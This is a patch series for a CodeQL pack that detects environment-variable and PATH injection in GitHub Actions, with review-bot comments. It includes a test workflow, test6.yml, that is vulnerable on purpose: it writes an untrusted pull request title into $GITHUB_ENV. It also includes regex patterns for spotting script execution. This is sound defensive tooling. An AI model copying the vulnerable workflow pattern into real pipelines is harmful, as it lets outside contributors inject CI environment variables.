@@ -23,6 +23,60 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. + * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH + * - var_name is the name of the env var + * - run is the Run step + * - key is the name assigned in the special workflow file. + * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` + * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` + * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` + */ +bindingset[var_name] +predicate envToRunFlow(string file, string var_name, Run run, string key) { + exists(string content, string value | + ( + file = "GITHUB_ENV" and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_OUTPUT" and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_PATH" and + writeToGitHubPath(run, content) and + key = "path" and + value = content + ) and + ( + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. 
+ // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | + run.getScript().splitAt("\n") = line + | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) + ) + ) +} + /** * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. @@ -32,20 +86,10 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name, string content, string value | + exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() - | - ( - writeToGitHubEnv(run, content) or - writeToGitHubOutput(run, content) - ) and - extractVariableAndValue(content, _, value) and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - writeToGitHubPath(run, content) and - value = content and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + succ.asExpr() = run.getScriptScalar() and + envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) ) } 
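Review bot: The intermediate-assignment branch of `envToRunFlow` only recognises a line that is exactly `NAME=value`: `regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1)` must match the whole line, so an indented assignment or one written as `export FOO=$(echo $BODY)` yields no `var2_name`. It also follows a single hop only. If that is intended, say so in the QLDoc above the predicate; otherwise allow the prefix, e.g. `"\\s*(?:export\\s+)?([a-zA-Z0-9\\-_]+)=(.*)"`, which keeps the two capture groups at the same indices.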
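Review bot: `envToRunStep` no longer covers writes to GITHUB_OUTPUT: the removed body accepted `writeToGitHubEnv(run, content) or writeToGitHubOutput(run, content)`, whereas the new call is `envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _)`. If the intent is that output writes are handled only by `envToOutputStoreStep`, a sentence in the QLDoc above would make that clear; otherwise add `"GITHUB_OUTPUT"` to the list. The commit message describes a refactor, so the narrowing may be accidental.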
@@ -63,16 +107,26 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists(Run run, string var_name, string key | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } +// predicate dISABLEDenvToOutputStoreStep( +// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +// ) { +// exists(Run run, string var_name, string content, string key, string value | +// writeToGitHubOutput(run, content) and +// extractVariableAndValue(content, key, value) and +// c = any(DataFlow::FieldContent ct | ct.getName() = key) and +// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and +// succ.asExpr() = run and +// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") +// ) +// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 453966f0101..cbdf9a917ce 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
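Review bot: The commented-out `dISABLEDenvToOutputStoreStep` predicate added here is the previous body of `envToOutputStoreStep` and should not be committed; version control already keeps it. `envToEnvStoreStep`, visible as context right below it, still uses the older inline `writeToGitHubEnv` / `extractVariableAndValue` matching rather than `envToRunFlow("GITHUB_ENV", var_name, run, key)`, so the indirect-assignment cases introduced in this commit would not be covered there. Its body continues outside the hunk, so this is based only on the first two lines shown.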
@@ -1,22 +1,26 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares a PATH environment variable with contents from a local file. + * e.g. + * run: | + * cat foo.txt >> $GITHUB_PATH + */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } @@ -31,15 +35,10 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { */ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubPath(run, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_PATH", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } 
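Review bot: The QLDoc added above `EnvPathInjectionFromFileReadSink` is phrased like a predicate ("Holds if …") although it documents a class, and it leaves out the condition the class body enforces: the Run step must follow an `UntrustedArtifactDownloadStep`. I would word it as `The script of a Run step that appends file-derived content to $GITHUB_PATH after an untrusted artifact download.` and keep the example. The same "Holds if …" wording is added to `EnvVarInjectionFromFileReadSink` in EnvVarInjectionQuery.qll and should be changed the same way.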
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a78963086e1..5a3dbebc512 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -1,12 +1,20 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | @@ -14,10 +22,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } 
@@ -32,16 +37,10 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_ENV", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d9978b2a423..4165df17a4d 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) + exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) ) } } @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) ) } 
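Review bot: In `LocalScriptExecutionRunStep`, `line.regexpCapture("(^|\\b|\\s+)" + regexp, group)` prepends a capturing group, so the `group` index stored in poisonable_steps.yml now counts a parenthesis that lives in this file; the rows there keep `3` only because the prefix group they lost is re-added here. Anyone adding a data-model row will select the wrong capture unless this is written down, so either add a comment such as `// group indices in poisonableLocalScriptsDataModel count the prefix group prepended here` or make the prefix non-capturing, `"(?:^|\\b|\\s+)"`, and lower the YAML indices to 2. The `regexpFind` call in `PoisonableCommandStep` is not affected because it does not use a group index. The class body continues outside the hunk.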
@@ -40,16 +40,12 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } } -class EnvVarInjectionRunStep extends PoisonableStep, Run { - EnvVarInjectionRunStep() { - exists(string content, string value | - // Heuristic: - // Run step with env var definition based on file content. - // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - // eg: `echo "sha=$(> $GITHUB_ENV` +class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { + EnvVarInjectionFromFileReadRunStep() { + exists(string content, string value| writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and - value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") + outputsPartialFileContent(value) ) } } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 11f17ae2623..dc835e7dab2 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -54,10 +54,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)(\\s+|;|$)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] + - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] + - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] + - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml new file mode 100644 index 00000000000..36340258515 --- /dev/null 
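Review bot: `EnvVarInjectionFromFileReadRunStep` loses the comment that explained its heuristic and gets no QLDoc in exchange, so a reader has to look up `outputsPartialFileContent` (not defined in this hunk) to learn what the class flags. I would add `/** A Run step that writes a value derived from file content to GITHUB_ENV. */` above the class. The removed pattern list included `ls `, so it is worth confirming that the helper still covers it or that dropping it is intended. Formatting: `string value|` needs a space before the bar.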
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -0,0 +1,28 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=${TITLE##*/} + echo PR_TITLE=${FOO} >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=$TITLE+ + echo PR_TITLE=$FOO >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + venv="$(echo $TITLE)')" + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 0dbff955318..9c2fd6faf46 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
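Review bot: test6.yml exercises the new two-step assignment flow only for GITHUB_ENV and only with steps that are expected to alert; since `envToRunFlow` is also called with `GITHUB_PATH` and `GITHUB_OUTPUT`, one step per target would pin those paths as well. A negative case is missing too, for example a step whose intermediate variable is assigned a constant, or one that references a variable whose name merely starts with the declared env var name (the `%$VAR%` pattern in FlowSteps.qll is a prefix match), so false positives from the heuristic would go unnoticed. The four empty lines at the end of the file can be dropped.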
@@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -36,6 +39,12 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -50,3 +59,6 @@ subpaths | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 5641ea53afd..7ea9865c70a 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -36,5 +39,11 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select From 39bff38d700f5f0b5bcb169dd210db7956348800 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:32:18 +0200 Subject: [PATCH 0369/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30120f7d321..16c801a0bad 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.8 +version: 0.1.9 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dad05ff4af3..4f1173bd9ad 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.8 +version: 0.1.9 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1281ca8e813069d2367b0bc6198ba29543826e3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Jul 2024 23:01:38 +0200 Subject: [PATCH 0370/1267] Bump qlpack versions --- ql/lib/codeql/actions/Ast.qll | 11 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 73 +++++++++++++++---- ql/lib/qlpack.yml | 2 +- .../Security/CWE-285/ImproperAccessControl.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 42 